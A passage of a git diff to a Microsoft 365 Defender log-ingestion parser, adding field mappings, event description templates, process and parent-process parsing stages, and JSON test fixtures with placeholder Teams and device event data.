}, + "organization": { + "id": "3b37ffc8520ef542" + }, + "related": { + "hosts": [ + "PC01" + ], + "user": [ + "sw-suser" + ] + }, + "rule": { + "category": "sigma", + "description": "Detects when a user account is added into the local Administrators group.\n This action can be the result of a malicious activity.", + "id": "12345678-abcd-ef90-1234-123456abcdef", + "name": "User Account Added to the Local Administrators Group" + }, + "user": { + "domain": "NT_DOMAIN", + "name": "sw-suser", + "roles": "Postesdetravail,Postesdetravail:Lot3", + "target": { + "domain": "Builtin", + "name": "Administrateurs" + } + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index f69ef372d..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -821,6 +821,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json index 21e3caf3c..2d1728daa 100644 --- a/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json +++ b/Microsoft/microsoft-365-defender/_meta/smart-descriptions.json @@ -1,4 +1,25 @@ [ + { + "value": "A new {action.type} cloud app event have been received", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" } + ] + }, + { + "value": "New {action.type} incident received: {microsoft.defender.investigation.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "cloud_app_events" + }, + { "field": "action.type" }, + { "field": "microsoft.defender.investigation.name" } + ] + }, { "value": "New incident {microsoft.defender.investigation.name}: {email.attachments.file.name} with hash {email.attachments.file.hash.sha256}", "conditions": [ @@ -132,6 +153,35 @@ } ] }, + { + "value": "{user.domain}\\{user.name} failed to log on {host.name}", + "conditions": [ + { + "field": "event.dataset", + "value": "device_logon_events" + }, + { + "field": "host.name" + }, + { + "field": "user.name" + }, + { + "field": "user.domain" + }, + { + "field": "action.type", + "value": "LogonFailed" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "host.name", + "type": "logged on" + } + ] + }, { "value": "{user.domain}\\{user.name} logged on {host.name}", "conditions": [ @@ -402,6 +452,28 @@ { "field": "email.to.address" } ] }, + { + "value": "{event.action} email from {email.from.address} to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" }, + { "field": "email.to.address" } + ] + }, + { + "value": "{event.action} email from {email.from.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.from.address" } + ] + }, + { + "value": "{event.action} email to {email.to.address}", + "conditions": [ + { "field": "event.dataset", "value": "email_events" }, + { "field": "email.to.address" } + ] + }, { "value": "{action.type} on {url.original}", "conditions": [ diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 2a8b6655f..d212bdb11 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -40,6 +40,10 @@ pipeline: input_field: "{{json_event.message.properties.RawEventData.Data}}" output_field: "data" - name: set_common_fields + - name: set_process_events + filter: '{{json_event.message.get("category") != "AdvancedHunting-DeviceProcessEvents"}}' + - name: set_process_deviceprocess_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents"}}' - name: set_alert_evidence_fields filter: '{{json_event.message.get("category") == "AdvancedHunting-AlertEvidence"}}' - name: set_alert_info_fields @@ -126,22 +130,6 @@ stages: host.os.full: "{{json_event.message.properties.OSPlatform}}" host.os.version: "{{json_event.message.properties.OSVersion}}" host.type: "{{json_event.message.properties.DeviceType}}" - process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" - process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" - process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" - process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" - process.start: "{{json_event.message.properties.ProcessCreationTime or json_event.message.properties.InitiatingProcessCreationTime}}" - process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" - process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" - process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" - process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" - process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" - process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" - process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" - process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" - process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" - process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" - process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" registry.data.type: "{{json_event.message.properties.RegistryValueType}}" registry.key: "{{json_event.message.properties.RegistryKey}}" registry.value: "{{json_event.message.properties.RegistryValueName}}" @@ -166,18 +154,6 @@ stages: action.properties.FileOriginReferrerUrl: "{{json_event.message.properties.FileOriginReferrerUrl}}" action.properties.FileOriginUrl: "{{json_event.message.properties.FileOriginUrl}}" action.properties.ISP: "{{json_event.message.properties.ISP or json_event.message.properties.Isp}}" - action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" action.properties.LocalIPType: "{{json_event.message.properties.LocalIPType}}" action.properties.Location: "{{json_event.message.properties.Location}}" action.properties.LogonId: "{{json_event.message.properties.LogonId}}" @@ -250,12 +226,6 @@ stages: - set: user.roles: '["{{json_event.message.properties.AccountType}}"]' filter: '{{json_event.message.properties.get("AccountType")}}' - - set: - process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 0}}' - - set: - process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' - filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 0}}' - set: network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}" filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}' @@ -274,6 +244,99 @@ stages: } filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}' + set_process_events: + actions: + - set: + process.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.pid: "{{json_event.message.properties.ProcessId or json_event.message.properties.InitiatingProcessId}}" + process.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine or json_event.message.properties.InitiatingProcessCommandLine}}" + process.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + + set_process_deviceprocess_events: + actions: + - set: + process.parent.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" + process.parent.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" + process.parent.command_line: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + process.parent.executable: "{{json_event.message.properties.InitiatingProcessFolderPath}}" + process.parent.hash.md5: "{{json_event.message.InitiatingProcessMD5 or json_event.message.properties.InitiatingProcessMD5}}" + process.parent.hash.sha1: "{{json_event.message.InitiatingProcessSHA1 or json_event.message.properties.InitiatingProcessSHA1}}" + process.parent.hash.sha256: "{{json_event.message.InitiatingProcessSHA256 or json_event.message.properties.InitiatingProcessSHA256}}" + process.parent.name: "{{json_event.message.properties.InitiatingProcessFileName | basename}}" + process.parent.pid: "{{json_event.message.properties.InitiatingProcessId}}" + process.parent.start: "{{json_event.message.properties.InitiatingProcessCreationTime}}" + process.parent.user.domain: "{{json_event.message.properties.InitiatingProcessAccountDomain}}" + process.parent.user.name: "{{json_event.message.properties.InitiatingProcessAccountName}}" + process.parent.user.id: "{{json_event.message.properties.InitiatingProcessAccountSid}}" + process.parent.user.email: "{{json_event.message.properties.InitiatingProcessAccountUpn}}" + process.parent.working_directory: "{{json_event.message.properties.InitiatingProcessFolderPath | dirname}}" + process.pid: "{{json_event.message.properties.ProcessId}}" + process.start: "{{json_event.message.properties.ProcessCreationTime}}" + process.name: "{{json_event.message.properties.FileName | basename}}" + process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" + process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + + - set: + process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("InitiatingProcessCommandLine") and json_event.message.properties.InitiatingProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:] != [""]}}' + + - set: + process.args: '{{json_event.message.properties.ProcessCommandLine.split(" ")[1:]}}' + filter: '{{json_event.message.properties.get("ProcessCommandLine") and json_event.message.properties.ProcessCommandLine.split(" ") | length > 1 and json_event.message.properties.ProcessCommandLine.split(" ")[1:] != [""]}}' + set_alert_evidence_fields: actions: - set: @@ -356,7 +419,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: @@ -469,15 +531,6 @@ stages: - set: event.dataset: "device_process_events" event.category: ["process"] - process.code_signature.status: "{{json_event.message.properties.InitiatingProcessSignatureStatus}}" - process.code_signature.subject_name: "{{json_event.message.properties.InitiatingProcessSignerType}}" - action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" set_device_registry_events_fields: actions: - set: diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json new file mode 100644 index 000000000..86f044fe7 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app4.json @@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": "{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json new file mode 100644 index 000000000..2655cb069 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json @@ -0,0 +1,97 @@ +{ + "input": { + "message": "{\"time\":\"2024-11-12T10:18:48.4363168Z\",\"tenantId\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceEvents\",\"_TimeReceivedBySvc\":\"2024-11-12T10:18:28.1484017Z\",\"properties\":{\"DeviceId\":\"abcdef0123456789\",\"DeviceName\":\"user.company.local\",\"ReportId\":73291,\"InitiatingProcessId\":1328,\"InitiatingProcessCreationTime\":\"2024-11-12T10:17:23.9905327Z\",\"InitiatingProcessCommandLine\":\"\\\"Browser.exe\\\" /Ticket 12345678-1234-5678-9012-345678901234 /ProjectID 123456789 /Network 0 /DBMode 0\",\"InitiatingProcessParentFileName\":\"Windows.exe\",\"InitiatingProcessParentId\":1820,\"InitiatingProcessParentCreationTime\":\"2024-10-14T05:47:54.3243814Z\",\"InitiatingProcessSHA1\":\"44543e0c6f30415c670c1322e61ca68602d58708\",\"InitiatingProcessMD5\":\"51a9cac9c4e8da44ffd7502be17604ee\",\"InitiatingProcessFileName\":\"browser.exe\",\"InitiatingProcessFolderPath\":\"c:\\\\program files (x86)\\\\browser.exe\",\"InitiatingProcessAccountName\":\"username\",\"InitiatingProcessAccountDomain\":\"company\",\"SHA1\":null,\"MD5\":null,\"FileName\":\"FileName.mdb\",\"FolderPath\":\"C:\\\\Log\",\"AccountName\":null,\"AccountDomain\":null,\"AdditionalFields\":null,\"InitiatingProcessAccountSid\":\"S-1-2-3\",\"AppGuardContainerId\":\"\",\"InitiatingProcessSHA256\":\"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\",\"SHA256\":null,\"RemoteUrl\":null,\"ProcessCreationTime\":null,\"ProcessTokenElevation\":null,\"ActionType\":\"SensitiveFileRead\",\"FileOriginUrl\":null,\"FileOriginIP\":null,\"InitiatingProcessLogonId\":5223047,\"AccountSid\":\"S-1-2-3\",\"RemoteDeviceName\":null,\"RegistryKey\":null,\"RegistryValueName\":null,\"RegistryValueData\":null,\"LogonId\":null,\"LocalIP\":null,\"LocalPort\":null,\"RemoteIP\":null,\"RemotePort\":null,\"ProcessId\":null,\"ProcessCommandLine\":null,\"InitiatingProcessAccountUpn\":\"USERNAME@COMPANY.COM\",\"InitiatingProcessAccountObjectId\":\"12345678-abcd-1234-ef09-abcdef123456\",\"FileSize\":286720,\"InitiatingProcessFileSize\":3316224,\"InitiatingProcessVersionInfoCompanyName\":\"Test Corporation\",\"InitiatingProcessVersionInfoProductName\":\"Test Product\",\"InitiatingProcessVersionInfoProductVersion\":\"1, 0, 0, 1\",\"InitiatingProcessVersionInfoInternalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoOriginalFileName\":\"Browser.EXE\",\"InitiatingProcessVersionInfoFileDescription\":\"Browser EXE\",\"InitiatingProcessSessionId\":1,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"CreatedProcessSessionId\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"Timestamp\":\"2024-11-12T10:17:24.8588296Z\",\"MachineGroup\":\"PC\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": 